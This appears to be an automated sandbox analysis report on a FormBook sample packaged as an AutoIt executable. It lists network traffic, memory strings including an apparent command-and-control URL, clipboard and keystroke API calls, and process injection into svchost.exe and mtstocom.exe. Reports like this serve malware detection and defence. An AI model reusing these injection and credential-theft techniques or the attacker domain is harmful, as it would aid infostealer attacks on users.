cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=796&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1687&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:02:55 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FVyc6fZq6Ex%2FOiGor1LeEAaZryKgckhSegA3mktgVao%2FZyrKhtFKTs7HPNWNjOCb2I2nJ9aIYOcCvUHQYc05dOp8NsC3HktaxHYdZ2QOnzFnWdNXIsFrPtNlukZsp1oAAdZi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe3ccb198d0c7c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1501&rtt_var=750&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=74&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10

Source: wjIagcdbKdk.exe, 00000007.00000002.3580689111.0000000009636000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.grimbo.boats
Source: wjIagcdbKdk.exe, 00000007.00000002.3580689111.0000000009636000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.grimbo.boats/ej4l/
Source: mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mtstocom.exe, 00000008.00000003.3060669624.000000000832E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mtstocom.exe, 00000008.00000002.3568272016.0000000003681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0025EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0025EAFF

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0025ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0025ED6A

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

0_2_0025EAFF

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0024AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0024AA57

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_00279576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00279576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3567988233.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2889384999.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3568159878.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3569278704.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3580689111.00000000095B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2890849255.0000000006400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3569480594.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2890116431.00000000033F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: smQoKNkwB7.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: smQoKNkwB7.exe, 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_bd44d140-7
Source: smQoKNkwB7.exe, 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2637ea87-5
Source: smQoKNkwB7.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c637fdfe-0
Source: smQoKNkwB7.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7d7b6d3e-4

Source: C:\Windows\SysWOW64\svchost.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C973 NtClose,	2_2_0042C973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572B60 NtClose,LdrInitializeThunk,	2_2_03572B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03572DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,	2_2_035735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03574340 NtSetContextThread,	2_2_03574340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03574650 NtSuspendThread,	2_2_03574650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BF0 NtAllocateVirtualMemory,	2_2_03572BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BE0 NtQueryValueKey,	2_2_03572BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572B80 NtQueryInformationFile,	2_2_03572B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BA0 NtEnumerateValueKey,	2_2_03572BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AD0 NtReadFile,	2_2_03572AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AF0 NtWriteFile,	2_2_03572AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AB0 NtWaitForSingleObject,	2_2_03572AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F60 NtCreateProcessEx,	2_2_03572F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F30 NtCreateSection,	2_2_03572F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FE0 NtCreateFile,	2_2_03572FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F90 NtProtectVirtualMemory,	2_2_03572F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FB0 NtResumeThread,	2_2_03572FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FA0 NtQuerySection,	2_2_03572FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572E30 NtWriteVirtualMemory,	2_2_03572E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572EE0 NtQueueApcThread,	2_2_03572EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572E80 NtReadVirtualMemory,	2_2_03572E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572EA0 NtAdjustPrivilegesToken,	2_2_03572EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D10 NtMapViewOfSection,	2_2_03572D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D00 NtSetInformationFile,	2_2_03572D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D30 NtUnmapViewOfSection,	2_2_03572D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DD0 NtDelayExecution,	2_2_03572DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DB0 NtEnumerateKey,	2_2_03572DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C70 NtFreeVirtualMemory,	2_2_03572C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C60 NtCreateKey,	2_2_03572C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C00 NtQueryInformationProcess,	2_2_03572C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CC0 NtQueryVirtualMemory,	2_2_03572CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CF0 NtOpenProcess,	2_2_03572CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CA0 NtQueryInformationToken,	2_2_03572CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573010 NtOpenDirectoryObject,	2_2_03573010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573090 NtSetValueKey,	2_2_03573090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035739B0 NtGetContextThread,	2_2_035739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573D70 NtOpenThread,	2_2_03573D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573D10 NtOpenProcessToken,	2_2_03573D10
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D4650 NtSuspendThread,LdrInitializeThunk,	8_2_052D4650
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D4340 NtSetContextThread,LdrInitializeThunk,	8_2_052D4340
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_052D2D30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2D10 NtMapViewOfSection,LdrInitializeThunk,	8_2_052D2D10
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_052D2DF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2DD0 NtDelayExecution,LdrInitializeThunk,	8_2_052D2DD0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2C60 NtCreateKey,LdrInitializeThunk,	8_2_052D2C60
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_052D2C70
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2CA0 NtQueryInformationToken,LdrInitializeThunk,	8_2_052D2CA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2F30 NtCreateSection,LdrInitializeThunk,	8_2_052D2F30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2FB0 NtResumeThread,LdrInitializeThunk,	8_2_052D2FB0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2FE0 NtCreateFile,LdrInitializeThunk,	8_2_052D2FE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2E80 NtReadVirtualMemory,LdrInitializeThunk,	8_2_052D2E80
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2EE0 NtQueueApcThread,LdrInitializeThunk,	8_2_052D2EE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2B60 NtClose,LdrInitializeThunk,	8_2_052D2B60
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2BA0 NtEnumerateValueKey,LdrInitializeThunk,	8_2_052D2BA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2BE0 NtQueryValueKey,LdrInitializeThunk,	8_2_052D2BE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_052D2BF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2AF0 NtWriteFile,LdrInitializeThunk,	8_2_052D2AF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2AD0 NtReadFile,LdrInitializeThunk,	8_2_052D2AD0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D35C0 NtCreateMutant,LdrInitializeThunk,	8_2_052D35C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D39B0 NtGetContextThread,LdrInitializeThunk,	8_2_052D39B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2D00 NtSetInformationFile,	8_2_052D2D00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2DB0 NtEnumerateKey,	8_2_052D2DB0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2C00 NtQueryInformationProcess,	8_2_052D2C00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2CF0 NtOpenProcess,	8_2_052D2CF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2CC0 NtQueryVirtualMemory,	8_2_052D2CC0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2F60 NtCreateProcessEx,	8_2_052D2F60
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2FA0 NtQuerySection,	8_2_052D2FA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2F90 NtProtectVirtualMemory,	8_2_052D2F90
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2E30 NtWriteVirtualMemory,	8_2_052D2E30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2EA0 NtAdjustPrivilegesToken,	8_2_052D2EA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2B80 NtQueryInformationFile,	8_2_052D2B80
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D2AB0 NtWaitForSingleObject,	8_2_052D2AB0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D3010 NtOpenDirectoryObject,	8_2_052D3010
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D3090 NtSetValueKey,	8_2_052D3090
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D3D10 NtOpenProcessToken,	8_2_052D3D10
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D3D70 NtOpenThread,	8_2_052D3D70
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032F9300 NtDeleteFile,	8_2_032F9300
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032F93A0 NtClose,	8_2_032F93A0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032F9210 NtReadFile,	8_2_032F9210
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032F90B0 NtCreateFile,	8_2_032F90B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032F9500 NtAllocateVirtualMemory,	8_2_032F9500
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_050FF9A3 NtSetContextThread,	8_2_050FF9A3

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0024D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0024D5EB

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_00241201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00241201

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0024E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0024E8F6

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_001EBF40	0_2_001EBF40
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00252046	0_2_00252046
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_001E8060	0_2_001E8060
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00248298	0_2_00248298
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0021E4FF	0_2_0021E4FF
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0021676B	0_2_0021676B
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00274873	0_2_00274873
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0020CAA0	0_2_0020CAA0
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_001ECAF0	0_2_001ECAF0
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_001FCC39	0_2_001FCC39
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00216DD9	0_2_00216DD9
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_001FB119	0_2_001FB119
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_001E91C0	0_2_001E91C0
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00201394	0_2_00201394
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0020781B	0_2_0020781B
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_001E7920	0_2_001E7920
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_001F997D	0_2_001F997D
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00207A4A	0_2_00207A4A
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00207CA7	0_2_00207CA7
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_0026BE44	0_2_0026BE44
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00219EEE	0_2_00219EEE
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_00D683F0	0_2_00D683F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418853	2_2_00418853
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004010C8	2_2_004010C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004010D0	2_2_004010D0
